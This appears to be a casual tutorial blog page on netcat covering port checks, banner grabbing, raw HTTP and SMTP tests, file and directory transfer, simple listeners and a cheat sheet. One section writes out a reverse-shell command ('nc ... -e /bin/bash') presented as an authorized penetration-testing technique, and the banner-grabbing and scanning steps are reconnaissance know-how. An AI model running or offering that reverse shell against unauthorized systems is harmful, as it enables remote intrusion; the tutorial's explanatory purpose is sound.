netcat network
the swiss army knife that IT forgot to lock up.
The netcat man page is short — about 200 lines. That’s because netcat does one simple thing: opens a network connection and sends data through it. What makes it powerful is that “send data through a network connection” turns out to be the foundation of almost everything.
You needed to check if a port was open. So you installed nmap. 25MB. You Googled “nmap check port” because the syntax isn’t obvious. You ran a scan. It took thirty seconds. It showed you a fancy table with “open” or “closed.” You felt like a hacker for about five seconds.
Or you needed to transfer a file between two machines on the same network. So you set up a temporary SAMBA share. Or you emailed it to yourself. Or you plugged in a USB drive like it was 2006.
netcat does both of those things — and a dozen others — with a single command. It’s been called “the Swiss army knife of networking” since the ’90s, and that name hasn’t stopped being accurate.
Unless you’re running Windows then wtf none of this applies to you. But hey, come to the dark side, go install WSL2 and you can follow along. We’ll wait. Impatiently.
If you’re lazy like me (all sysadmins are!) then click here for the netcat cheat sheet.
Which netcat?
There are several implementations. The two most common:
- ncat (from nmap) —
ncat— the modern, full-featured version - OpenBSD netcat —
nc— ships with most Linux distros by default
Most examples on this page work with both. When there’s a difference, it’s noted. Check what you have:
nc -h 2>&1 | head -5
Check if a port is open
nc -zv 10.0.0.5 22
Connection to 10.0.0.5 22 port [tcp/ssh] succeeded!
-z means zero-I/O mode — just check the connection, don’t send data. -v makes it verbose so you see the result. Instant. No nmap. No install. No scan table.
Check multiple ports
nc -zv 10.0.0.5 20-25
Scans ports 20 through 25. Shows which are open and which refused.
Check a range of common ports
nc -zv 10.0.0.5 22 80 443 3306 5432 8080
Specific ports. SSH, HTTP, HTTPS, MySQL, PostgreSQL, and a common dev server port. Done in under a second.
With a timeout
nc -zv -w 3 10.0.0.5 443
-w 3 sets a 3-second timeout. Without it, netcat might hang on filtered ports (firewalled but not rejecting) for a long time.
Test if a service is responding
HTTP
echo -e "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n" | nc example.com 80
Sends a raw HTTP request and shows the response. You can see headers, status codes, and the response body. For quick “is this web server alive and what is it returning” checks without a browser.
SMTP
nc mail.example.com 25
Connects to a mail server. You’ll see the SMTP banner. You can manually send EHLO commands. For diagnosing mail delivery issues when you need to see exactly what the server says.
Transfer files (quick and dirty)
No SCP. No SFTP. No SAMBA share. No USB drive. Two machines, one network, one file.
On the receiving machine
nc -l -p 9999 > received_file.tar.gz
Listens on port 9999 and writes whatever comes in to a file.
On the sending machine
nc 10.0.0.5 9999 < file_to_send.tar.gz
Sends the file to the receiving machine on port 9999. The file appears on the other end. Transfer complete.
This is not encrypted. Not authenticated. Not secured in any way. Use it on trusted networks for quick transfers. For anything else, use scp or rsync.
Transfer a whole directory
# Receiver
nc -l -p 9999 | tar -xzf -
# Sender
tar -czf - /path/to/directory | nc 10.0.0.5 9999
Tar compresses on the fly, netcat ships it over the network, tar decompresses on the other end. One pipeline. No temporary files.
Chat between two machines
Machine 1 (listener)
nc -l -p 4444
Machine 2 (connector)
nc 10.0.0.5 4444
Type in either terminal and it appears on the other one. Two-way text chat over the network. It’s not Slack, but it works when nothing else is available and you need to communicate with someone on the same network.
Listen on a port (simple server)
nc -l -p 8080
Opens port 8080 and waits for a connection. Whatever the client sends, you see in your terminal. Whatever you type, the client receives. This is the foundation of everything else netcat does — it’s just “open a port and pipe data.”
Respond with a message
echo "Server is alive" | nc -l -p 8080
Anyone connecting to port 8080 gets “Server is alive” and the connection closes. A one-line health check endpoint. No web server required.
Keep listening (serve multiple connections)
while true; do echo "OK" | nc -l -p 8080; done
Re-opens the port after each connection. A persistent (if crude) service.
Banner grabbing (what’s running on that port?)
nc -v 10.0.0.5 22
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
Connect to a port and read the service banner. Now you know the SSH version, OS, and patch level. Works on any service that sends a banner — SSH, SMTP, FTP, MySQL.
echo "" | nc -v -w 3 10.0.0.5 3306
MySQL also sends a banner on connect. The version string tells you what you’re dealing with before you even authenticate.
Reverse shell (for authorized testing only)
This is a legitimate penetration testing technique. Only use on systems you’re authorized to test.
On your machine (listener)
nc -l -p 4444
On the target (sends shell back to you)
nc 10.0.0.5 4444 -e /bin/bash
The target machine sends a bash shell to your listener. You can type commands on your machine and they execute on the target. Note: -e is only available in ncat and the traditional netcat, not the OpenBSD version.
This is a core tool in penetration testing. If you’re in cybersecurity, you’ve used this or will use this. If you’re not, now you know what it looks like in your logs.
The flags that actually matter
| Flag | What it does |
|---|---|
-l |
Listen mode — wait for incoming connections. |
-p PORT |
Specify the port to listen on or connect to. |
-v |
Verbose — show connection info. |
-z |
Zero-I/O — scan mode, just check if port is open. |
-w SECS |
Timeout after N seconds. |
-u |
Use UDP instead of TCP. |
-e PROG |
Execute a program on connection (ncat only). |
-n |
No DNS resolution — use IPs only. |
“But I use—”
Sure you do.
“nmap is better for port scanning.” nmap is a dedicated port scanner with OS detection, service versioning, script engines, and NSE scripts. It’s incredible for comprehensive scans. It’s also 25MB and overkill when you just want to check if port 443 is open. nc -zv answers that question in half a second without installing anything.
“I use telnet to test ports.” Telnet works. It also sends your credentials in cleartext, has been deprecated for decades, and isn’t installed by default on modern systems. netcat does everything telnet does plus file transfers, scanning, and scripting. It’s telnet’s cooler younger sibling who actually finished school.
“I use SCP/SFTP for file transfers.” As you should — for transfers that need encryption and authentication. netcat’s file transfer is for “I need to copy this 50MB file to the box next to me right now” situations where setting up keys isn’t worth the thirty seconds it takes.
“Ncat is better than nc.” Ncat adds SSL support, access control, and the -e flag. If you’re doing security work, use ncat. If you’re checking ports and doing quick transfers, plain nc is fine. Know both.
netcat cheat sheet
You made it. Or you skipped straight here. Either way, no judgment. Copy and paste these. Pin them. Tattoo them on your forearm. Whatever works.
| What you’re doing | Command |
|---|---|
| Check if a port is open | nc -zv host 22 |
| Scan a port range | nc -zv host 20-25 |
| Check with timeout | nc -zv -w 3 host 443 |
| Grab a service banner | nc -v host 22 |
| Listen on a port | nc -l -p 8080 |
| Send a file | nc host 9999 < file.tar.gz |
| Receive a file | nc -l -p 9999 > file.tar.gz |
| Transfer a directory | Sender: tar czf - dir | nc host 9999 |
Receiver: nc -l -p 9999 | tar xzf - |
|
| Raw HTTP request | echo -e "GET / HTTP/1.1\r\nHost: host\r\n\r\n" | nc host 80 |
| Quick chat (listener) | nc -l -p 4444 |
| Quick chat (connector) | nc host 4444 |
The one command:
nc -zv host port— is the port open? Yes or no. Faster than nmap, simpler than telnet, already installed.